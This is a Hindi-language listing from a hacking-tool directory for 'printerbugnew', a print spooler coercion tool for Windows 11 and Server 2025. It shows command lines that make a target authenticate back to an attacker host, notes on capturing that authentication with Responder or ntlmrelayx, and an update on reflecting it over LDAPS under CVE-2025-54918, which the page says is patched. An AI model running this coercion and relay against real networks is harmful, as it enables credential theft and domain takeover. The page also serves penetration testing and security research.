Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
printerbugnew — केवल DCERPC वाला printerbug.py संस्करण | Kitploit
उपकरण/GitHubGitHub/decoder-it/printerbugnew
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंग
GitHubdecoder-it/printerbugnew

printerbugnew

केवल DCERPC वाला printerbug.py संस्करण

रिपॉजिटरी देखें
23326210 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शुद्ध RPC over TCP प्रिंटर स्पूलर ट्रिगर

विंडोज 11 22H2+ / विंडोज सर्वर 2025 के लिए

उपयोग

root@kitploit:~
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]

उदाहरण

अनाम कनेक्शन

root@kitploit:~
printerbugnew.py 192.168.1.100

क्रेडेंशियल्स के साथ

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN

विभिन्न होस्ट (हमलावर) पर बैककनेक्ट ट्रिगर करें

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50

विशिष्ट RPC पोर्ट का उपयोग करें

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

नोट्स

  • लक्ष्य विंडोज 11 22H2+ या सर्वर 2025 होना चाहिए (डिफ़ॉल्ट RPC over TCP)
  • पुराने संस्करणों के लिए, spoolss नेम्ड पाइप्स (SMB) पर RPC का उपयोग करता है
  • सुनिश्चित करें कि पोर्ट 135 और डायनामिक RPC पोर्ट (49152-65535) खुले हैं
  • प्रमाणीकरण कैप्चर करने के लिए attacker_host पर रिस्पॉन्डर या ntlmrelayx प्रारंभ करें
  • इस मामले में केर्बेरोस स्पूलर से खराब SPN के कारण विफल हो जाता है, जिससे NTLM फ़ॉलबैक मजबूर होता है।
  • लक्ष्य स्पूलर का RPC/TCP पोर्ट TCP/135 पर लक्ष्य एंडपॉइंट मैपर (EPM) को इंटरफ़ेस UUID 12345678-1234-abcd-ef00-0123456789ab के लिए क्वेरी करके खोजें। आप rpcdump.py, PortQry, या अपनी पसंद का कोई भी उपकरण उपयोग कर सकते हैं - या बस इस कोड में सीधे EPM लुकअप लागू करें ;)
  • https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py पर आधारित

    चित्र

    चित्र

    चित्र

CVE-2025-54918 के लिए अपडेट

यह रिफ्लेक्शन के माध्यम से शोषण केवल W2025 पर "नए" प्रिंटरबग (नेम्ड पाइप्स के बजाय DCERPC) के साथ काम करता है। इसे काम करने के लिए आपको ntlmrelayx में कुछ बिंदुओं पर संशोधन करने की आवश्यकता होगी। उसके बाद, आप W2025 DC पर प्रिंटर बग को दूरस्थ रूप से ट्रिगर कर सकते हैं और LDAPS के माध्यम से प्रमाणीकरण को रिफ्लेक्ट कर सकते हैं (!), भले ही चैनल बाइंडिंग आवश्यक हो।

ldaprelayclient.py:
चित्र
rpcrelayserver.py
चित्र

और रिले ;)
चित्र


यह कमजोरी सितंबर 2025 पैच मंगलवार में ठीक की गई: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918

फिक्स यह सुनिश्चित करता है कि MIC की गणना हमेशा की जाए, भले ही टाइप 3 संदेश खाली हो।

इस CVE के लेखक को एक मूल्यवान संकेत के लिए धन्यवाद :)

टूल डाउनलोड करें